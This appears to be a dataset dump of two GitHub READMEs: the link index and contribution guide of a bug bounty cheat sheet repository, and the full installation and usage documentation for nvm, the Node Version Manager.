text
stringlengths
9
334k
# Bug Bounty Cheat Sheet</h1> | 📚 Reference | 🔎 Vulnerabilities | |-------------------------------------------------------------|-----------------------------------------------------------| | [Bug Bounty Platforms](cheatsheets/bugbountyplatforms.md) | [XSS](cheatsheets/xss.md) | | [Books](cheatsheets/books.md) | [SQLi](cheatsheets/sqli.md) | | [Special Tools](cheatsheets/special-tools.md) | [SSRF](cheatsheets/ssrf.md) | | [Recon](cheatsheets/recon.md) | [CRLF Injection](cheatsheets/crlf.md) | | [Practice Platforms](cheatsheets/practice-platforms.md) | [CSV Injection](cheatsheets/csv-injection.md) | | [Bug Bounty Tips](cheatsheets/bugbountytips.md) | [LFI](cheatsheets/lfi.md) | | | [XXE](cheatsheets/xxe.md) | | | [RCE](cheatsheets/rce.md) | | | [Open Redirect](cheatsheets/open-redirect.md) | | | [Crypto](cheatsheets/crypto.md) | | | [Template Injection](cheatsheets/template-injection.md) | | | [Content Injection](cheatsheets/content-injection.md) | | | [XSLT Injection](cheatsheets/xslt.md) | # Contributing We welcome contributions from the public. ### Using the issue tracker 💡 The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues) ### Issues and labels 🏷 Our bug tracker utilizes several labels to help organize and identify issues. ### Guidelines for bug reports 🐛 Use the GitHub issue search — check if the issue has already been reported. # Style Guide We like to keep our Markdown files as uniform as possible. So if you submit a PR, make sure to follow this style guide (we will not be angry if you do not). - Cheat sheet titles should start with `##`. - Subheadings should be made bold. (`**Subheading**`) - Add newlines after subheadings and code blocks. - Code blocks should use three backticks. (```) - Make sure to use syntax highlighting whenever possible. # Contributors - [EdOverflow](https://github.com/EdOverflow) - [GerbenJavado](https://github.com/GerbenJavado) - [jon_bottarini](https://github.com/BlueTower) - [sp1d3r](https://github.com/sp1d3r) - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) - [kuromatae](https://github.com/kuromatae) - [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors)
# Node Version Manager [![Build Status](https://travis-ci.org/nvm-sh/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.37.0-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684) <!-- To update this table of contents, ensure you have run `npm install` then `npm run doctoc` --> <!-- START doctoc generated TOC please keep comment here to allow auto update --> <!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE --> ## Table of Contents - [About](#about) - [Installing and Updating](#installing-and-updating) - [Install & Update Script](#install--update-script) - [Additional Notes](#additional-notes) - [Troubleshooting on Linux](#troubleshooting-on-linux) - [Troubleshooting on macOS](#troubleshooting-on-macos) - [Ansible](#ansible) - [Verify Installation](#verify-installation) - [Important Notes](#important-notes) - [Git Install](#git-install) - [Manual Install](#manual-install) - [Manual Upgrade](#manual-upgrade) - [Usage](#usage) - [Long-term Support](#long-term-support) - [Migrating Global Packages While Installing](#migrating-global-packages-while-installing) - [Default Global Packages From File While Installing](#default-global-packages-from-file-while-installing) - [io.js](#iojs) - [System Version of Node](#system-version-of-node) - [Listing Versions](#listing-versions) - [Suppressing colorized output](#suppressing-colorized-output) - [.nvmrc](#nvmrc) - [Deeper Shell Integration](#deeper-shell-integration) - [bash](#bash) - [Automatically call `nvm use`](#automatically-call-nvm-use) - [zsh](#zsh) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file) - [fish](#fish) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file-1) - [License](#license) - [Running Tests](#running-tests) - [Environment variables](#environment-variables) - [Bash Completion](#bash-completion) - [Usage](#usage-1) - [Compatibility Issues](#compatibility-issues) - [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux) - [Uninstalling / Removal](#uninstalling--removal) - [Manual Uninstall](#manual-uninstall) - [Docker For Development Environment](#docker-for-development-environment) - [Problems](#problems) - [macOS Troubleshooting](#macos-troubleshooting) <!-- END doctoc generated TOC please keep comment here to allow auto update --> ## About nvm is a version manager for [node.js](https://nodejs.org/en/), designed to be installed per-user, and invoked per-shell. `nvm` works on any POSIX-compliant shell (sh, dash, ksh, zsh, bash), in particular on these platforms: unix, macOS, and windows WSL. <a id="installation-and-update"></a> <a id="install-script"></a> ## Installing and Updating ### Install & Update Script To **install** or **update** nvm, you should run the [install script][2]. To do that, you may either download and run the script manually, or use the following cURL or Wget command: ```sh curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.0/install.sh | bash ``` ```sh wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.0/install.sh | bash ``` Running either of the above commands downloads a script and runs it. The script clones the nvm repository to `~/.nvm`, and attempts to add the source lines from the snippet below to the correct profile file (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`). <a id="profile_snippet"></a> ```sh export NVM_DIR="$([ -z "${XDG_CONFIG_HOME-}" ] && printf %s "${HOME}/.nvm" || printf %s "${XDG_CONFIG_HOME}/nvm")" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm ``` #### Additional Notes - If the environment variable `$XDG_CONFIG_HOME` is present, it will place the `nvm` files there.</sub> - You can add `--no-use` to the end of the above script (...`nvm.sh --no-use`) to postpone using `nvm` until you manually [`use`](#usage) it. - You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables. Eg: `curl ... | NVM_DIR="path/to/nvm"`. Ensure that the `NVM_DIR` does not contain a trailing slash. - The installer can use `git`, `curl`, or `wget` to download `nvm`, whichever is available. #### Troubleshooting on Linux On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type `command -v nvm`, simply close your current terminal, open a new terminal, and try verifying again. #### Troubleshooting on macOS Since OS X 10.9, `/usr/bin/git` has been preset by Xcode command line tools, which means we can't properly detect if Git is installed or not. You need to manually install the Xcode command line tools before running the install script, otherwise, it'll fail. (see [#1782](https://github.com/nvm-sh/nvm/issues/1782)) If you get `nvm: command not found` after running the install script, one of the following might be the reason: - Since macOS 10.15, the default shell is `zsh` and nvm will look for `.zshrc` to update, none is installed by default. Create one with `touch ~/.zshrc` and run the install script again. - If you use bash, the previous default shell, run `touch ~/.bash_profile` to create the necessary profile file if it does not exist. - You might need to restart your terminal instance or run `. ~/.nvm/nvm.sh`. Restarting your terminal/opening a new tab/window, or running the source command will load the command and the new configuration. If the above doesn't fix the problem, you may try the following: - If you use bash, it may be that your `.bash_profile` (or `~/.profile`) does not source your `~/.bashrc` properly. You could fix this by adding `source ~/<your_profile_file>` to it or follow the next step below. - Try adding [the snippet from the install section](#profile_snippet), that finds the correct nvm directory and loads nvm, to your usual profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`). - For more information about this issue and possible workarounds, please [refer here](https://github.com/nvm-sh/nvm/issues/576) #### Ansible You can use a task: ```yaml - name: nvm shell: > curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.0/install.sh | bash args: creates: "{{ ansible_env.HOME }}/.nvm/nvm.sh" ``` ### Verify Installation To verify that nvm has been installed, do: ```sh command -v nvm ``` which should output `nvm` if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary. ### Important Notes If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work. **Note:** `nvm` does not support Windows (see [#284](https://github.com/nvm-sh/nvm/issues/284)), but may work in WSL (Windows Subsystem for Linux) depending on the version of WSL. For Windows, two alternatives exist, which are neither supported nor developed by us: - [nvm-windows](https://github.com/coreybutler/nvm-windows) - [nodist](https://github.com/marcelklehr/nodist) **Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/nvm-sh/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us: - [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell - [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup - [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell - [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish - [fish-nvm](https://github.com/FabioAntunes/fish-nvm) - Wrapper around nvm for fish, delays sourcing nvm until it's actually used. **Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket: - [[#900] [Bug] nodejs on FreeBSD may need to be patched](https://github.com/nvm-sh/nvm/issues/900) - [nodejs/node#3716](https://github.com/nodejs/node/issues/3716) **Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that: - [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/) **Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that: - When using `nvm` you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt` - If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with `nvm`) - You can (but should not?) keep your previous "system" node install, but `nvm` will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*` Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue. **Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade. **Note:** Git versions before v1.7 may face a problem of cloning `nvm` source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article. ### Git Install If you have `git` installed (requires git v1.7.10+): 1. clone this repo in the root of your user profile - `cd ~/` from anywhere then `git clone https://github.com/nvm-sh/nvm.git .nvm` 1. `cd ~/.nvm` and check out the latest version with `git checkout v0.37.0` 1. activate `nvm` by sourcing it from your shell: `. nvm.sh` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Install For a fully manual install, execute the following lines to first clone the `nvm` repository into `$HOME/.nvm`, and then load `nvm`: ```sh export NVM_DIR="$HOME/.nvm" && ( git clone https://github.com/nvm-sh/nvm.git "$NVM_DIR" cd "$NVM_DIR" git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)` ) && \. "$NVM_DIR/nvm.sh" ``` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm ``` ### Manual Upgrade For manual upgrade with `git` (requires git v1.7.10+): 1. change to the `$NVM_DIR` 1. pull down the latest changes 1. check out the latest version 1. activate the new version ```sh ( cd "$NVM_DIR" git fetch --tags origin git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)` ) && \. "$NVM_DIR/nvm.sh" ``` ## Usage To download, compile, and install the latest release of node, do this: ```sh nvm install node # "node" is an alias for the latest version ``` To install a specific version of node: ```sh nvm install 6.14.4 # or 10.10.0, 8.9.1, etc ``` The first version installed becomes the default. New shells will start with the default version of node (e.g., `nvm alias default`). You can list available versions using `ls-remote`: ```sh nvm ls-remote ``` And then in any new shell just use the installed version: ```sh nvm use node ``` Or you can just run it: ```sh nvm run node --version ``` Or, you can run any arbitrary command in a subshell with the desired version of node: ```sh nvm exec 4.2 node --version ``` You can also get the path to the executable to where it was installed: ```sh nvm which 5.0 ``` In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc: - `node`: this installs the latest version of [`node`](https://nodejs.org/en/) - `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/) - `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`. - `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in SemVer, versions communicate breakage, not stability). ### Long-term Support Node has a [schedule](https://github.com/nodejs/Release#release-schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments: - `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon` - `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon` - `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon` - `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon` - `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon` - `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon` - `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon` Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported. To get the latest LTS version of node and migrate your existing installed packages, use ```sh nvm install 'lts/*' --reinstall-packages-from=current ``` ### Migrating Global Packages While Installing If you want to install a new version of Node.js and migrate npm packages from a previous version: ```sh nvm install node --reinstall-packages-from=node ``` This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one. You can also install and migrate npm packages from specific versions of Node like this: ```sh nvm install 6 --reinstall-packages-from=5 nvm install v4.2 --reinstall-packages-from=iojs ``` Note that reinstalling packages _explicitly does not update the npm version_ — this is to ensure that npm isn't accidentally upgraded to a broken version for the new node version. To update npm at the same time add the `--latest-npm` flag, like this: ```sh nvm install lts/* --reinstall-packages-from=default --latest-npm ``` or, you can at any time run the following command to get the latest supported npm version on the current node version: ```sh nvm install-latest-npm ``` If you've already gotten an error to the effect of "npm does not support Node.js", you'll need to (1) revert to a previous node version (`nvm ls` & `nvm use <your latest _working_ version from the ls>`, (2) delete the newly created node version (`nvm uninstall <your _broken_ version of node from the ls>`), then (3) rerun your `nvm install` with the `--latest-npm` flag. ### Default Global Packages From File While Installing If you have a list of default packages you want installed every time you install a new version, we support that too -- just add the package names, one per line, to the file `$NVM_DIR/default-packages`. You can add anything npm would accept as a package argument on the command line. ```sh # $NVM_DIR/default-packages rimraf object-inspect@1.0.2 stevemao/left-pad ``` ### io.js If you want to install [io.js](https://github.com/iojs/io.js/): ```sh nvm install iojs ``` If you want to install a new version of io.js and migrate npm packages from a previous version: ```sh nvm install iojs --reinstall-packages-from=iojs ``` The same guidelines mentioned for migrating npm packages in node are applicable to io.js. ### System Version of Node If you want to use the system-installed version of node, you can use the special default alias "system": ```sh nvm use system nvm run system --version ``` ### Listing Versions If you want to see what versions are installed: ```sh nvm ls ``` If you want to see what versions are available to install: ```sh nvm ls-remote ``` #### Suppressing colorized output `nvm ls`, `nvm ls-remote` and `nvm alias` usually produce colorized output. You can disable colors with the `--no-colors` option (or by setting the environment variable `TERM=dumb`): ```sh nvm ls --no-colors TERM=dumb nvm ls ``` To restore your PATH, you can deactivate it: ```sh nvm deactivate ``` To set a default Node version to be used in any new shell, use the alias 'default': ```sh nvm alias default node ``` To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`: ```sh export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install node NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2 ``` To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`: ```sh export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 ``` `nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions. ### .nvmrc You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory). Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line. For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory: ```sh $ echo "5.9" > .nvmrc $ echo "lts/*" > .nvmrc # to default to the latest LTS version $ echo "node" > .nvmrc # to default to the latest version ``` [NB these examples assume a POSIX-compliant shell version of `echo`. If you use a Windows `cmd` development environment, eg the `.nvmrc` file is used to configure a remote Linux deployment, then keep in mind the `"`s will be copied leading to an invalid file. Remove them.] Then when you run nvm: ```sh $ nvm use Found '/path/to/project/.nvmrc' with version <5.9> Now using node v5.9.1 (npm v3.7.3) ``` `nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized. The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required. ### Deeper Shell Integration You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new). If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples. #### bash ##### Automatically call `nvm use` Put the following at the end of your `$HOME/.bashrc`: ```bash find-up() { path=$(pwd) while [[ "$path" != "" && ! -e "$path/$1" ]]; do path=${path%/*} done echo "$path" } cdnvm() { cd "$@"; nvm_path=$(find-up .nvmrc | tr -d '\n') # If there are no .nvmrc file, use the default nvm version if [[ ! $nvm_path = *[^[:space:]]* ]]; then declare default_version; default_version=$(nvm version default); # If there is no default version, set it to `node` # This will use the latest version on your machine if [[ $default_version == "N/A" ]]; then nvm alias default node; default_version=$(nvm version default); fi # If the current version is not the default version, set it to use the default version if [[ $(nvm current) != "$default_version" ]]; then nvm use default; fi elif [[ -s $nvm_path/.nvmrc && -r $nvm_path/.nvmrc ]]; then declare nvm_version nvm_version=$(<"$nvm_path"/.nvmrc) declare locally_resolved_nvm_version # `nvm ls` will check all locally-available versions # If there are multiple matching versions, take the latest one # Remove the `->` and `*` characters and spaces # `locally_resolved_nvm_version` will be `N/A` if no local versions are found locally_resolved_nvm_version=$(nvm ls --no-colors "$nvm_version" | tail -1 | tr -d '\->*' | tr -d '[:space:]') # If it is not already installed, install it # `nvm install` will implicitly use the newly-installed version if [[ "$locally_resolved_nvm_version" == "N/A" ]]; then nvm install "$nvm_version"; elif [[ $(nvm current) != "$locally_resolved_nvm_version" ]]; then nvm use "$nvm_version"; fi fi } alias cd='cdnvm' cd $PWD ``` This alias would search 'up' from your current directory in order to detect a `.nvmrc` file. If it finds it, it will switch to that version; if not, it will use the default version. #### zsh ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an `.nvmrc` file with a string telling nvm which node to `use`: ```zsh # place this after nvm initialization! autoload -U add-zsh-hook load-nvmrc() { local node_version="$(nvm version)" local nvmrc_path="$(nvm_find_nvmrc)" if [ -n "$nvmrc_path" ]; then local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")") if [ "$nvmrc_node_version" = "N/A" ]; then nvm install elif [ "$nvmrc_node_version" != "$node_version" ]; then nvm use fi elif [ "$node_version" != "$(nvm version default)" ]; then echo "Reverting to nvm default version" nvm use default fi } add-zsh-hook chpwd load-nvmrc load-nvmrc ``` #### fish ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file This requires that you have [bass](https://github.com/edc/bass) installed. ```fish # ~/.config/fish/functions/nvm.fish function nvm bass source ~/.nvm/nvm.sh --no-use ';' nvm $argv end # ~/.config/fish/functions/nvm_find_nvmrc.fish function nvm_find_nvmrc bass source ~/.nvm/nvm.sh --no-use ';' nvm_find_nvmrc end # ~/.config/fish/functions/load_nvm.fish function load_nvm --on-variable="PWD" set -l default_node_version (nvm version default) set -l node_version (nvm version) set -l nvmrc_path (nvm_find_nvmrc) if test -n "$nvmrc_path" set -l nvmrc_node_version (nvm version (cat $nvmrc_path)) if test "$nvmrc_node_version" = "N/A" nvm install (cat $nvmrc_path) else if test nvmrc_node_version != node_version nvm use $nvmrc_node_version end else if test "$node_version" != "$default_node_version" echo "Reverting to default Node version" nvm use default end end # ~/.config/fish/config.fish # You must call it on initialization or listening to directory switching won't work load_nvm ``` ## License nvm is released under the MIT license. Copyright (C) 2010 Tim Caswell and Jordan Harband Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ## Running Tests Tests are written in [Urchin]. Install Urchin (and other dependencies) like so: npm install There are slow tests and fast tests. The slow tests do things like install node and check that the right versions are used. The fast tests fake this to test things like aliases and uninstalling. From the root of the nvm git repository, run the fast tests like this: npm run test/fast Run the slow tests like this: npm run test/slow Run all of the tests like this: npm test Nota bene: Avoid running nvm while the tests are running. ## Environment variables nvm exposes the following environment variables: - `NVM_DIR` - nvm's installation directory. - `NVM_BIN` - where node, npm, and global packages for the active version of node are installed. - `NVM_INC` - node's include file directory (useful for building C/C++ addons for node). - `NVM_CD_FLAGS` - used to maintain compatibility with zsh. - `NVM_RC_VERSION` - version from .nvmrc file if being used. Additionally, nvm modifies `PATH`, and, if present, `MANPATH` and `NODE_PATH` when changing versions. ## Bash Completion To activate, you need to source `bash_completion`: ```sh [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`). ### Usage nvm: > $ nvm <kbd>Tab</kbd> ``` alias deactivate install list-remote reinstall-packages uninstall version cache exec install-latest-npm ls run unload version-remote current help list ls-remote unalias use which ``` nvm alias: > $ nvm alias <kbd>Tab</kbd> ``` default iojs lts/* lts/argon lts/boron lts/carbon lts/dubnium lts/erbium node stable unstable ``` > $ nvm alias my_alias <kbd>Tab</kbd> ``` v10.22.0 v12.18.3 v14.8.0 ``` nvm use: > $ nvm use <kbd>Tab</kbd> ``` my_alias default v10.22.0 v12.18.3 v14.8.0 ``` nvm uninstall: > $ nvm uninstall <kbd>Tab</kbd> ``` my_alias default v10.22.0 v12.18.3 v14.8.0 ``` ## Compatibility Issues `nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606)) The following are known to cause issues: Inside `~/.npmrc`: ```sh prefix='some/path' ``` Environment Variables: ```sh $NPM_CONFIG_PREFIX $PREFIX ``` Shell settings: ```sh set -e ``` ## Installing nvm on Alpine Linux In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides these pre-compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al). Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [BusyBox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. BusyBox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that. There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally. If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell: ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.0/install.sh | bash ``` The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries. As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node). <a id="removal"></a> ## Uninstalling / Removal ### Manual Uninstall To remove `nvm` manually, execute the following: ```sh $ rm -rf "$NVM_DIR" ``` Edit `~/.bashrc` (or other shell resource config) and remove the lines below: ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` ## Docker For Development Environment To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository: ```sh $ docker build -t nvm-dev . ``` This will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`: ```sh $ docker images REPOSITORY TAG IMAGE ID CREATED SIZE nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB ``` If you got no error message, now you can easily involve in: ```sh $ docker run -h nvm-dev -it nvm-dev nvm@nvm-dev:~/.nvm$ ``` Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage. For more information and documentation about docker, please refer to its official website: - https://www.docker.com/ - https://docs.docker.com/ ## Problems - If you try to install a node version and the installation fails, be sure to run `nvm cache clear` to delete cached node downloads, or you might get an error like the following: curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume. - Where's my `sudo node`? Check out [#43](https://github.com/nvm-sh/nvm/issues/43) - After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source: ```sh nvm install -s 0.8.6 ``` - If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/nvm-sh/nvm/issues/658)) ## macOS Troubleshooting **nvm node version not found in vim shell** If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run: ```shell sudo chmod ugo-x /usr/libexec/path_helper ``` More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x). **nvm is not compatible with the npm config "prefix" option** Some solutions for this issue can be found [here](https://github.com/nvm-sh/nvm/issues/1245) There is one more edge case causing this issue, and that's a **mismatch between the `$HOME` path and the user's home directory's actual name**. You have to make sure that the user directory name in `$HOME` and the user directory name you'd see from running `ls /Users/` **are capitalized the same way** ([See this issue](https://github.com/nvm-sh/nvm/issues/2261)). To change the user directory and/or account name follow the instructions [here](https://support.apple.com/en-us/HT201548) [1]: https://github.com/nvm-sh/nvm.git [2]: https://github.com/nvm-sh/nvm/blob/v0.37.0/install.sh [3]: https://travis-ci.org/nvm-sh/nvm [4]: https://github.com/nvm-sh/nvm/releases/tag/v0.37.0 [Urchin]: https://github.com/scraperwiki/urchin [Fish]: http://fishshell.com
